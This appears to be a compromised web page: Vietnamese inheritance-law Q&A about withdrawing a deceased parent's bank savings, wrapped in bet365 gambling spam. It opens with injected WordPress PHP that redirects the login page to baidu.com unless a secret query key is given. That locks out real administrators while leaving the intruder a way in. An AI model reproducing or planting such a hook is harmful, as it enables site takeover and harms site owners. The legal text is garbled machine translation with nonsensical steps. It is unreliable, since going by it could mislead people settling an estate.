//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Làm thế nào để rút tiền thông qua thừa kế? | nhà cái bet365 có uy tín không?_ đăng ký bet365_tỷ lệ cược bet365

Làm thế nào để rút tiền thông qua thừa kế?

Tôi muốn hỏi về thủ tục để chứng minh rằng tôi là người thừa kế hợp pháp?

Tư vấn viên

Theo di chúc, cha bạn chỉ định bạn có quyền nhận tiền gửi tiết kiệm ngân hàng. Tuy nhiên, để bảo vệ quyền của những người thừa kế, bạn không thể chỉ ra ý muốn rút tiền tiết kiệm của cha bạn.

Theo các Điều 609, 624 và 626 của Bộ luật Dân sự 2015 và Điều 58 của Luật Công chứng 2014, để có được tiền tiết kiệm của cha bạn, bạn phải thực hiện thủ tục thừa kế tại văn phòng công chứng.

Để thực hiện thủ tục thừa kế, bạn phải chuẩn bị các tài liệu: di chúc của cha bạn, quốc tịch hoặc chứng minh thư, hộ khẩu, giấy khai sinh, giấy chứng tử của người chết và tài khoản tiết kiệm ngân hàng. –Sau khi bạn có tất cả các tài liệu trên, hãy liên hệ với văn phòng công chứng tại khu vực nơi cha bạn sống trước khi bạn chết và yêu cầu quá trình thừa kế.

Kiểm tra các tài liệu và nếu bạn đủ điều kiện để được tuyên bố là người thừa kế, công chứng viên sẽ tiếp tục làm thủ tục. Sau khi chứng từ công chứng được công chứng, bạn có thể liên hệ với ngân hàng để rút tiền.

Xin lưu ý rằng nếu cha của bạn có người thừa kế, theo quy định tại Điều 644 của Bộ luật Dân sự (bao gồm trẻ vị thành niên, cha mẹ, vợ hoặc chồng, con trưởng thành không có khả năng làm việc), bạn phải nằm trong số những người này hoặc đại diện hợp pháp của họ Đồng hành cùng. -Khi thực hiện các thủ tục trên, bạn phải khai báo một số mẫu giấy theo yêu cầu của ngân hàng. Cha bạn nộp tiền theo luật và trả phí công chứng.

Luật sư của Công ty Luật Hà Nội Wutianrong Baoan

nhà cái bet365 có uy tín không?_ đăng ký bet365_tỷ lệ cược bet365